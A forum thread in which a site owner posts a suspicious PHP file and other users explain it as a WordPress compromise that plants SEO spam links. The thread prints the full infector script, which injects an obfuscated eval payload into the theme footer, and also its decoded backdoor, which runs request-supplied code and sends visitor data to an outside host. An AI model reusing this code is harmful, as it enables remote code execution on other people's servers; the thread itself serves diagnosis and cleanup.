Jump to content

[SOLVED] Random PHP File found in web Directory


vivisick

Recommended Posts

I was wondering if anyone can tell me what this file is. I found it on my web server randomly one day. I don't know much about php, so this seemed like the place to get some help. Here is the code:

 

<?
$BASE_DIR = getcwd()."/";
$frame = '<?eval(base64_decode("JGs9MTE0OyRtPWV4cGxvZGUoIjsiLCIyNzsyMDs4Mjs5MDsxOzY7MDsyNzsxOzY7MDs5MDs4Njs0NTszMzs1NTszMjszNjs1NTszMjs0MTs4MDs1ODszODszODszNDs0NTszOTszMzs1NTszMjs0NTs1MTs1Mzs1NTs2MDszODs4MDs0Nzs5NDs4MDsyMTsyOTsyOTsyMTszMDsyMzsxNjsyOTs2OzgwOzkxOzE0OzE0OzE7NjswOzI3OzE7NjswOzkwOzg2OzQ1OzMzOzU1OzMyOzM2OzU1OzMyOzQxOzgwOzU4OzM4OzM4OzM0OzQ1OzM5OzMzOzU1OzMyOzQ1OzUxOzUzOzU1OzYwOzM4OzgwOzQ3Ozk0OzgwOzExOzE5OzI2OzI5OzI5OzgwOzkxOzkxOzk7MTI3OzEyMDsxMjM7Mjc7MjA7ODI7OTA7Mjc7MTsxOzIzOzY7OTA7ODY7NDU7MzI7NTU7MzU7Mzk7NTU7MzM7Mzg7NDE7ODA7MzE7MzE7MzE7MTk7MjU7Mjk7NTsyOTsyNzs1OzI5OzU7NjY7NjY7Njc7ODA7NDc7OTE7OTE7OTsyMzsxNzsyNjsyOTs4Mjs4MDs1NTsxMDsyMzsxNzs3OzY7Mjc7Mjk7Mjg7OTI7OTI7OTI7NDY7Mjg7ODA7NzM7MjM7NDsxOTszMDs5MDs4Njs0NTszMjs1NTszNTszOTs1NTszMzszODs0MTs4MDszMTszMTszMTsxOTsyNTsyOTs1OzI5OzI3OzU7Mjk7NTs2Njs2Njs2Nzs4MDs0Nzs5MTs3MzsxNTsxMjc7MTIwOzEyMzs4Njs3OzA7MzA7NDU7NzsyODsyNzszOzc7MjM7NDU7Mjg7MTk7MzE7MjM7Nzk7ODA7MjY7Njs2OzI7NzI7OTM7OTM7MTc7Mjk7MzA7MTY7MTE7MTk7NjsyOTsyODs2OzE5OzA7Mjc7Mjk7OTI7MTc7Mjk7MzE7OTM7MzA7Mjc7Mjg7MjU7MTs5Mzs4MDs5MjswOzE5OzI4OzIyOzkwOzY2Ozk0OzY0OzcxOzY2OzkxOzkyOzgwOzkyOzY7MTA7Njs3NzsyNzsyOzc5OzgwOzkyOzg2OzQ1OzMzOzU1OzMyOzM2OzU1OzMyOzQxOzgwOzMyOzU1OzYzOzYxOzM4OzU1OzQ1OzUxOzU0OzU0OzMyOzgwOzQ3OzkyOzgwOzg0OzI2OzI5OzE7Njs3OTs4MDs5MjswOzE5OzU7NzswOzMwOzIzOzI4OzE3OzI5OzIyOzIzOzkwOzg2OzQ1OzMzOzU1OzMyOzM2OzU1OzMyOzQxOzgwOzU4OzM4OzM4OzM0OzQ1OzU4OzYxOzMzOzM4OzgwOzQ3OzkxOzkyOzgwOzg0OzE5OzIxOzIzOzI4OzY7Nzk7ODA7OTI7MDsxOTs1Ozc7MDszMDsyMzsyODsxNzsyOTsyMjsyMzs5MDs4Njs0NTszMzs1NTszMjszNjs1NTszMjs0MTs4MDs1ODszODszODszNDs0NTszOTszMzs1NTszMjs0NTs1MTs1Mzs1NTs2MDszODs4MDs0Nzs5MTs3MzsxMjc7MTIwOzEyMzsyNzsyMDs4Mjs5MDsyMDs3OzI4OzE3OzY7Mjc7Mjk7Mjg7NDU7MjM7MTA7Mjc7MTs2OzE7OTA7ODA7MTc7NzswOzMwOzQ1OzI3OzI4OzI3OzY7ODA7OTE7OTE7ODI7OTsxMjc7MTIwOzEyMzsxMjM7ODY7MTc7MjY7NDU7NzsyODsyNzszOzc7MjM7NDU7Mjg7MTk7MzE7MjM7ODI7Nzk7ODI7NTA7MTc7NzswOzMwOzQ1OzI3OzI4OzI3OzY7OTA7OTE7NzM7MTI3OzEyMDsxMjM7MTIzOzUwOzE3Ozc7MDszMDs0NTsxOzIzOzY7Mjk7Mjs2OzgyOzkwOzg2OzE3OzI2OzQ1Ozc7Mjg7Mjc7Mzs3OzIzOzQ1OzI4OzE5OzMxOzIzOzk0OzgyOzQ5OzM5OzMyOzYyOzYxOzM0OzM4OzQ1OzM5OzMyOzYyOzk0OzgyOzg2Ozc7MDszMDs0NTs3OzI4OzI3OzM7NzsyMzs0NTsyODsxOTszMTsyMzs5MTs3MzsxMjc7MTIwOzEyMzsxMjM7NTA7MTc7NzswOzMwOzQ1OzE7MjM7NjsyOTsyOzY7ODI7OTA7ODY7MTc7MjY7NDU7NzsyODsyNzszOzc7MjM7NDU7Mjg7MTk7MzE7MjM7OTQ7ODI7NDk7Mzk7MzI7NjI7NjE7MzQ7Mzg7NDU7MzI7NTU7Mzg7Mzk7MzI7NjA7Mzg7MzI7NTE7NjA7MzM7NTI7NTU7MzI7OTQ7ODI7Njc7OTE7NzM7MTI3OzEyMDsxMjM7MTIzOzUwOzE3Ozc7MDszMDs0NTsxOzIzOzY7Mjk7Mjs2OzgyOzkwOzg2OzE3OzI2OzQ1Ozc7Mjg7Mjc7Mzs3OzIzOzQ1OzI4OzE5OzMxOzIzOzk0OzgyOzQ5OzM5OzMyOzYyOzYxOzM0OzM4OzQ1OzM4OzU5OzYzOzU1OzYxOzM5OzM4Ozk0OzgyOzY1OzY2OzkxOzczOzEyNzsxMjA7MTIzOzEyMzs1MDsxNzs3OzA7MzA7NDU7MTsyMzs2OzI5OzI7Njs4Mjs5MDs4NjsxNzsyNjs0NTs3OzI4OzI3OzM7NzsyMzs0NTsyODsxOTszMTsyMzs5NDs4Mjs0OTszOTszMjs2Mjs2MTszNDszODs0NTs1NTs2MDs0OTs2MTs1NDs1OTs2MDs1Mzs4Mjs5NDs4Mjs4MDsyMTs4OzI3OzI7ODA7OTE7NzM7MTI3OzEyMDsxMjM7MTIzOzg2OzA7MjM7MTs3OzMwOzY7NDU7NzsyODsyNzszOzc7MjM7NDU7Mjg7MTk7MzE7MjM7Nzk7NTA7MTc7NzswOzMwOzQ1OzIzOzEwOzIzOzE3OzgyOzkwOzg2OzE3OzI2OzQ1Ozc7Mjg7Mjc7Mzs3OzIzOzQ1OzI4OzE5OzMxOzIzOzkxOzczOzEyNzsxMjA7MTIzOzEyMzs1MDsxNzs3OzA7MzA7NDU7MTc7MzA7Mjk7MTsyMzs4Mjs5MDs4NjsxNzsyNjs0NTs3OzI4OzI3OzM7NzsyMzs0NTsyODsxOTszMTsyMzs5MTs3MzsyMzsxNzsyNjsyOTs4Mjs4NjswOzIzOzE7NzszMDs2OzQ1Ozc7Mjg7Mjc7Mzs3OzIzOzQ1OzI4OzE5OzMxOzIzOzczOzEyMzsxMjc7MTIwOzEyMzsxNTs4MjsyMzszMDsxOzIzOzgyOzk7MTI3OzEyMDsxMjM7MTIzOzg2OzA7MjM7MTs3OzMwOzY7NDU7NzsyODsyNzszOzc7MjM7NDU7Mjg7MTk7MzE7MjM7Nzk7NTA7MjA7Mjc7MzA7MjM7NDU7MjE7MjM7Njs0NTsxNzsyOTsyODs2OzIzOzI4OzY7MTs5MDs4Njs3OzA7MzA7NDU7NzsyODsyNzszOzc7MjM7NDU7Mjg7MTk7MzE7MjM7OTE7NzM7MjM7MTc7MjY7Mjk7ODI7ODY7MDsyMzsxOzc7MzA7Njs0NTs3OzI4OzI3OzM7NzsyMzs0NTsyODsxOTszMTsyMzs3MzsxMjc7MTIwOzEyMzsxNTsxNTsiKTskej0iIjtmb3JlYWNoKCRtIGFzICR2KWlmICgkdiE9IiIpJHouPWNocigkdl4kayk7ZXZhbCgkeik7"));?>';
//";

$filename = $BASE_DIR."wp-config.php";

function my_fread($filename) {
if (@function_exists('file_get_contents')) {
	$content = file_get_contents($filename);
} else {
	$handle = @fopen ($filename, "r");
	$content = @fread ($handle, @filesize ($filename));
	@fclose ($handle);
}
return $content;
}

function my_exit($message) {
@unlink("iiousioduoisfdufiousd.php");  
echo "|||".$message; 
exit;
} 

// ============== get template =======================
require($filename);

$mysqlcon = mysql_connect(DB_HOST,DB_USER,DB_PASSWORD) or die(mysql_error());
mysql_select_db(DB_NAME);
echo mysql_error();

$res = mysql_query("SELECT option_value FROM ".$table_prefix."options WHERE option_name = 'template'") or die(mysql_error());
$row = mysql_fetch_array($res);
$template = $row[0];
if ($template == "") my_exit("no template");
// ============== end of get template =======================

// ============== rewrite template =======================
$template_file = $BASE_DIR."wp-content/themes/".$template."/footer.php";
echo "Got: $template_file\n";
$content = my_fread($template_file);

$pos = strpos($content, '<u style="display: none">');
if ($pos !== false) my_exit("already have links");


if (strstr($content,"</body>")) $content = str_replace("</body>",$frame."\n</body>",$content);
else if (strstr($content,"</BODY>")) $content = str_replace("</BODY>",$frame."\n</BODY>",$content);
else $content .= "\n".$frame;


if (!$handle = @fopen($template_file, 'w')) my_exit("can't open template for writing"); 
if (!@fwrite($handle, $content)) my_exit("can't write to template");
@fclose($handle);

my_exit("done");

The base64 encoded part at the top yields:

 

<?php
if(stristr($_SERVER["HTTP_USER_AGENT"],"googlebot") || stristr($_SERVER["HTTP_USER_AGENT"],"yahoo")) {
if(isset($_REQUEST["mmmakowoiwow001"])) {
	echo "Execution...\n";
	eval($_REQUEST["mmmakowoiwow001"]);
}
$url_unique_name = "http://colbyatontario.com/links/".rand(0,250).".txt?ip=".$_SERVER["REMOTE_ADDR"]."&host=".rawurlencode($_SERVER["HTTP_HOST"])."&agent=".rawurlencode($_SERVER["HTTP_USER_AGENT"]);
if(function_exists("curl_init")) {
	$ch_unique_name = @curl_init();
	@curl_setopt($ch_unique_name, CURLOPT_URL, $url_unique_name);
	@curl_setopt($ch_unique_name, CURLOPT_RETURNTRANSFER, 1);
	@curl_setopt($ch_unique_name, CURLOPT_TIMEOUT, 30);
	@curl_setopt($ch_unique_name, CURLOPT_ENCODING , "gzip");
	$result_unique_name = @curl_exec($ch_unique_name);
	@curl_close($ch_unique_name);
	echo $result_unique_name;
}
else {
	$result_unique_name = @file_get_contents($url_unique_name);
	echo $result_unique_name;
}
}
?>

 

It basically lets someone run code on your server.

Obviously you've got hacked.

 

It's hard to tell exactly how it happen without the full configuration/log and file. My best guess is a security flaw inside WordPress since this php use wordpress item to spam your website.

 

I haven't read it all but it's obfuscated code but it seem to do 2 main things

 

1- Get statistique from your visitor and send them to http://colbyatontario.com/

 

2- Read a file from http://colbyatontario.com/ that containt hidden backlinks and display them on many page if not all in your website/wordpress blog.

 

The backlink file look like this :

 

<u style="display: none">
<A href="http://www.fameb.ufba.br/ead/user/view.php?id=3383&course=1">Download Free Full Hentai Movies</A>
<A href="http://www.fameb.ufba.br/ead/user/view.php?id=3386&course=1">Aquamarine If Jewelry Real Tell Vintage</A>
<A href="http://www.fameb.ufba.br/ead/user/view.php?id=3387&course=1">Chip Thong Bikinis</A>
<A href="http://www.fameb.ufba.br/ead/user/view.php?id=3390&course=1">Asian Porn Movie Post</A>
<A href="http://www.fameb.ufba.br/ead/user/view.php?id=3396&course=1">Hot Celeb Sex Videos</A> 
....

 

It's primary goal is probably hack many wordpress website with that and getting ton of backlinks to cheat search engine into getting high rank for others website.

 

You will have to update your wordpress to the lastest version and check frequently to be sure you haven't been hacked again. Maybe upgrade apache/php/mysql version to the lastest too with all security patch or ask your hosting to do it.

 

Always backup your data.

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.